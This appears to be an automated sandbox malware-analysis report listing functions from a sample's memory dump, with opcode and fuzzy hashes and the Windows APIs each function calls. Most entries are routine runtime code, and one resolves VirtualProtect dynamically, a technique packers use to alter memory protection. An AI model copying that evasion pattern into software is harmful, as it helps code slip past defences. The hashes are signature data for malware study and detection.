                                                                                                          • Opcode ID: 4d30357ed03cd5d9dd56456e710180a1604a57bfecd667e220f3216d5371ffde
                                                                                                          • Instruction ID: 166dc264aa3b3acd9c2bee358aba4ec5532fb591cdcd99603f4b1fc518f61e57
                                                                                                          • Opcode Fuzzy Hash: 4d30357ed03cd5d9dd56456e710180a1604a57bfecd667e220f3216d5371ffde
                                                                                                          • Instruction Fuzzy Hash: 45E04F30A85384B7EB201B62EC4AB9D3B979B10B51F244031F90DAC6F2DBA2E8509959
                                                                                                          APIs
                                                                                                          • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 006DD421
                                                                                                            • Part of subcall function 006D5471: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006D6C45,?,00000000,-00000008), ref: 006D54D2
                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006DD673
                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006DD6B9
                                                                                                          • GetLastError.KERNEL32 ref: 006DD75C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 2112829910-0
                                                                                                          • Opcode ID: 2263a3ad9130de97c65de942f2748c48a437094eacc689ea9d82b637ca4f1382
                                                                                                          • Instruction ID: 7e654446a10ae64200f688476df8e629b9d27da3274b236fdd5a2105a229fb9f
                                                                                                          • Opcode Fuzzy Hash: 2263a3ad9130de97c65de942f2748c48a437094eacc689ea9d82b637ca4f1382
                                                                                                          • Instruction Fuzzy Hash: 70D14AB5D042589FCF15DFA8D880AEDBBF6FF09314F28416AE466EB351D630A942CB50
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AdjustPointer
                                                                                                          • String ID:
                                                                                                          • API String ID: 1740715915-0
                                                                                                          • Opcode ID: c7578f95a455e3f191f7591e8af6711bbd362c25df8946a359d47251d8c898c2
                                                                                                          • Instruction ID: 290a2f462a62074062990e4b61bf86dc63b04f614bea5bd8ba6b7114c614a8fb
                                                                                                          • Opcode Fuzzy Hash: c7578f95a455e3f191f7591e8af6711bbd362c25df8946a359d47251d8c898c2
                                                                                                          • Instruction Fuzzy Hash: B951E172E05246AFDB288F50C881BBAB3A6FF05340F24412FE81997791EB31EC41DB90
                                                                                                          APIs
                                                                                                            • Part of subcall function 006D5471: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006D6C45,?,00000000,-00000008), ref: 006D54D2
                                                                                                          • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 006DB24A
                                                                                                          • __dosmaperr.LIBCMT ref: 006DB251
                                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 006DB28B
                                                                                                          • __dosmaperr.LIBCMT ref: 006DB292
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 1913693674-0
                                                                                                          • Opcode ID: 91193064c462a4d00d0ee22b6b853d02cca50bf9238de22d25f322905e60aa99
                                                                                                          • Instruction ID: 2b0b43f8fc2bb98f4bc8ddfb17423b32418e6fc2ef92712456ede86c7f5f4c03
                                                                                                          • Opcode Fuzzy Hash: 91193064c462a4d00d0ee22b6b853d02cca50bf9238de22d25f322905e60aa99
                                                                                                          • Instruction Fuzzy Hash: 19219072E00205EFDB20AF618881D7FB7AAEF02364712561EF8599B751DB30EE418B90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0f025c7ba3bafae7c8a973c8a816fff08e584b73a5314f0f1d11f6ea75dd075b
                                                                                                          • Instruction ID: 0746a24e70a9f7ec5d4e13d3ee71d6b49c3cfcc826e607b516846784251cd75b
                                                                                                          • Opcode Fuzzy Hash: 0f025c7ba3bafae7c8a973c8a816fff08e584b73a5314f0f1d11f6ea75dd075b
                                                                                                          • Instruction Fuzzy Hash: 96217F31600619AFCB50EFA59C95EBB77AAEF01374715451DF81DDB250EB30EC4187A0
                                                                                                          APIs
                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 006DC5E6
                                                                                                            • Part of subcall function 006D5471: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006D6C45,?,00000000,-00000008), ref: 006D54D2
                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006DC61E
                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006DC63E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 158306478-0
                                                                                                          • Opcode ID: b0e02cdaeab57613ae6dec4347c9745a40555f6d35a85670694cab56029ca133
                                                                                                          • Instruction ID: c5b140bd517cf8cf70587aa988c3a9bdcd732e4bc69769815be370171150857c
                                                                                                          • Opcode Fuzzy Hash: b0e02cdaeab57613ae6dec4347c9745a40555f6d35a85670694cab56029ca133
                                                                                                          • Instruction Fuzzy Hash: 0E1104A1D01A9A7FA72127715CCACBF79AEDE893A4750241AF802D1300FE60CD0195B9
                                                                                                          APIs
                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,006E38EF,00000000,00000001,?,?,?,006DD7B0,?,00000000,00000000), ref: 006E4417
                                                                                                          • GetLastError.KERNEL32(?,006E38EF,00000000,00000001,?,?,?,006DD7B0,?,00000000,00000000,?,?,?,006DD0F6,?), ref: 006E4423
                                                                                                            • Part of subcall function 006E4480: CloseHandle.KERNEL32(FFFFFFFE,006E4433,?,006E38EF,00000000,00000001,?,?,?,006DD7B0,?,00000000,00000000,?,?), ref: 006E4490
                                                                                                          • ___initconout.LIBCMT ref: 006E4433
                                                                                                            • Part of subcall function 006E4455: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006E43F1,006E38DC,?,?,006DD7B0,?,00000000,00000000,?), ref: 006E4468
                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,006E38EF,00000000,00000001,?,?,?,006DD7B0,?,00000000,00000000,?), ref: 006E4448
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                          • String ID:
                                                                                                          • API String ID: 2744216297-0
                                                                                                          • Opcode ID: e3dce4ac7ba4bdde20ecc7810362184170dd5668e782ff9244aeb63bd1ce6405
                                                                                                          • Instruction ID: 0c1f85e47bf4f20877443e6ee56a867ac57e95673ff62e1f11f77bed4cc0a3ec
                                                                                                          • Opcode Fuzzy Hash: e3dce4ac7ba4bdde20ecc7810362184170dd5668e782ff9244aeb63bd1ce6405
                                                                                                          • Instruction Fuzzy Hash: 12F03736201294FBCF531FE5EC44A993FA7FB493A4B055010FA1889170CB338960DB95
                                                                                                          APIs
                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 006CA3A7
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006CA3B6
                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 006CA3BF
                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 006CA3CC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2933794660-0
                                                                                                          • Opcode ID: 48b013122d02ae7bb38361cab42a42950241af6db9e656eefe8ba0c301a3e47d
                                                                                                          • Instruction ID: dec05fdcb9db8343e7399ed20c1ec2875004ec4153a06a29c4e53bdb608a31cd
                                                                                                          • Opcode Fuzzy Hash: 48b013122d02ae7bb38361cab42a42950241af6db9e656eefe8ba0c301a3e47d
                                                                                                          • Instruction Fuzzy Hash: C3F0B234C0030DEBCB00DBB4C98898EBBF4FF1C200BA15996E412EB110E730AB44CB50
                                                                                                          APIs
                                                                                                            • Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
                                                                                                            • Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660
                                                                                                          • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,006CF869,?,?,?,00000055,?,-00000050,?,?,?), ref: 006D9E55
                                                                                                          • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,006CF869,?,?,?,00000055,?,-00000050,?,?), ref: 006D9E8C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$CodePageValid
                                                                                                          • String ID: utf8
                                                                                                          • API String ID: 943130320-905460609
                                                                                                          • Opcode ID: e5d19edca31601c55c81d55c9cfb06d86d529aeaf0f6c11d5840ddfdc6f38a55
                                                                                                          • Instruction ID: d568eb450087bfefaa26ed2ce6ba0fbe2614a824aee537a3ed82de95c5dcadca
                                                                                                          • Opcode Fuzzy Hash: e5d19edca31601c55c81d55c9cfb06d86d529aeaf0f6c11d5840ddfdc6f38a55
                                                                                                          • Instruction Fuzzy Hash: 9351C471E04301AADB69AB71CC42BF673ABAF45700F15052FF545DB381EB70D98096B5
                                                                                                          APIs
                                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,006D4CE1,?,?,00000000,00000000,00000000,?), ref: 006D4E05
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EncodePointer
                                                                                                          • String ID: MOC$RCC
                                                                                                          • API String ID: 2118026453-2084237596
                                                                                                          • Opcode ID: 4ed9aac59775e8f91cb6c90ac09c3834c9d203e7bd6d01498e867e50e6fa7db5
                                                                                                          • Instruction ID: 40d8cde3cf1dd708f04527163ec683459525edcb8dba508aa544db83d4dcdd5c
                                                                                                          • Opcode Fuzzy Hash: 4ed9aac59775e8f91cb6c90ac09c3834c9d203e7bd6d01498e867e50e6fa7db5
                                                                                                          • Instruction Fuzzy Hash: ED413571D00209ABCF15DF98D881AEEBBB6BF48304F18415AF908A7361DB359D51DB50
                                                                                                          APIs
                                                                                                            • Part of subcall function 006D5327: HeapFree.KERNEL32(00000000,00000000,?,006D96D4,?,00000000,?,?,006D9374,?,00000007,?,?,006D9CBA,?,?), ref: 006D533D
                                                                                                            • Part of subcall function 006D5327: GetLastError.KERNEL32(?,?,006D96D4,?,00000000,?,?,006D9374,?,00000007,?,?,006D9CBA,?,?), ref: 006D5348
                                                                                                          • ___free_lconv_mon.LIBCMT ref: 006D9B3E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFreeHeapLast___free_lconv_mon
                                                                                                          • String ID: 8o$To
                                                                                                          • API String ID: 4068849827-4097019444
                                                                                                          • Opcode ID: 207a0ad1777b56e50f78e4f9543e9255d3c91081ef2eb2b0b061b1bfea7b7416
                                                                                                          • Instruction ID: 8f845076f473ea7681de5f513b951825c8658b27454987d44fe8b950460375b7
                                                                                                          • Opcode Fuzzy Hash: 207a0ad1777b56e50f78e4f9543e9255d3c91081ef2eb2b0b061b1bfea7b7416
                                                                                                          • Instruction Fuzzy Hash: 25314C31D00B04AEEB716A39E845BAA73EAFB04350F51581FE05AD7751EF71EC40CA64
                                                                                                          APIs
                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 006D48C3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___except_validate_context_record
                                                                                                          • String ID: csm$csm
                                                                                                          • API String ID: 3493665558-3733052814
                                                                                                          • Opcode ID: cec44ff90cb3f615703a2aea4aabbdddd7316519af3b5e5caad02235652a194f
                                                                                                          • Instruction ID: 3a70ef5a1311adbc7e33400e1a3849bf5b85b60e05d6158528c57efbdcce4137
                                                                                                          • Opcode Fuzzy Hash: cec44ff90cb3f615703a2aea4aabbdddd7316519af3b5e5caad02235652a194f
                                                                                                          • Instruction Fuzzy Hash: 5C3181329002199BCF269F56C8949AB7BA7FB09315B18459BF8985D321CB33DC61DB81
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc
                                                                                                          • String ID: @$VirtualProtect
                                                                                                          • API String ID: 190572456-29487290
                                                                                                          • Opcode ID: 41fbe3fcc0634bc16172d27e5a3bec50ae95f0b78b08f3829117b3f4d789a645
                                                                                                          • Instruction ID: 1a39bf10bc275509c2bb5d5c11549f831b7f46fe989772c777423bf2bddb6e0c
                                                                                                          • Opcode Fuzzy Hash: 41fbe3fcc0634bc16172d27e5a3bec50ae95f0b78b08f3829117b3f4d789a645
                                                                                                          • Instruction Fuzzy Hash: 3D41D2B0900209DFDB04DFA9D998AAEBBF1FF48304F10841EE848AB351D775A944CF85
                                                                                                          APIs
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006C3A1E
                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006C3A49
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                          • String ID: w2l
                                                                                                          • API String ID: 593203224-126607045
                                                                                                          • Opcode ID: 7866a4aa9b0e68e05ff3af0b0829a8d468126f645a3304131a9e2b6db268f9d8
                                                                                                          • Instruction ID: 56b32f82c41ffb9ceb60bfb108dcd0a32ec55245e485ea997930840757c885cd
                                                                                                          • Opcode Fuzzy Hash: 7866a4aa9b0e68e05ff3af0b0829a8d468126f645a3304131a9e2b6db268f9d8
                                                                                                          • Instruction Fuzzy Hash: E101C0B0D04208DFCB44EFA8D881BADBBB1FB08300F8054ADE416AB351DB306A54CF55
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary
                                                                                                          • String ID: #v
                                                                                                          • API String ID: 3664257935-554117064
                                                                                                          • Opcode ID: 7b2bc8b17d6824c900989cbedb41db33d3808025dd827478461ee9e026d6b8e7
                                                                                                          • Instruction ID: e439ef1e48a044a982acff6c66005ba8ca8214f92a7b3c2cab13b027e0846b4c
                                                                                                          • Opcode Fuzzy Hash: 7b2bc8b17d6824c900989cbedb41db33d3808025dd827478461ee9e026d6b8e7
                                                                                                          • Instruction Fuzzy Hash: 50C0027D981406DFCF012F65FE0E82D3A21BB66346B0400B5A80591275EABB0934BF2B